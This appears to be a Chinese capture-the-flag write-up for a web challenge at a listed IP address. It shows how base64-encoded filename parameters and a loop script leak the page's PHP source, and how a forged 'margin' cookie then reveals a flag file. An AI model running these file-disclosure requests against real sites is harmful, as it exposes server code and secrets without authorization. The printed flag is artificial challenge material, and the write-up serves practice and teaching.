看那一堆重复的串什么也不是
记得看url,url里也可能隐藏信息 a2V5cy50eHQ= 像base64 转化后:keys.txt
说明一进来访问的是web11/index.php?line=&filename=keys.txt
改一下line=&filename=index.php
转base64 line=&filename=aW5kZXgucGhw
查看源代码得到第0行
view-source:http://123.206.87.240:8002/web11/index.php?filename=aW5kZXgucGhw
?line=1&filename=aW5kZXgucGhw
line=1的到第一行。。。。。把所有的代码拿出来
写个脚本拿
import requests a=30 for i in range(a): url="http://123.206.87.240:8002/web11/index.php?line="+str(i)+"&filename=aW5kZXgucGhw" s=requests.get(url) print (s.text) |
<?php error_reporting(0); $file=base64_decode(isset($_GET['filename'])?$_GET['filename']:""); $line=isset($_GET['line'])?intval($_GET['line']):0; if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ="); $file_list = array( '0' =>'keys.txt', '1' =>'index.php', ); if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){ $file_list[2]='keys.php'; } if(in_array($file, $file_list)){ $fa = file($file);//整个$file文件读入一个数组中 echo $fa[$line]; } ?> |
如果if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin')
file_list会多出来一个keys.php文件,同时要得到keys.php文件内容还需要使$file=keys.php
即:
1.需要$file=keys.php从php代码中可以看出来,我们需要将keys.php这段字符串Base64加密
a2V5cy5waHA= 然后将其作为filename的值
2.还要构造Cookie: margin=margin这个Cookie头
学会需改Cookie的方法
KEY{key_keys}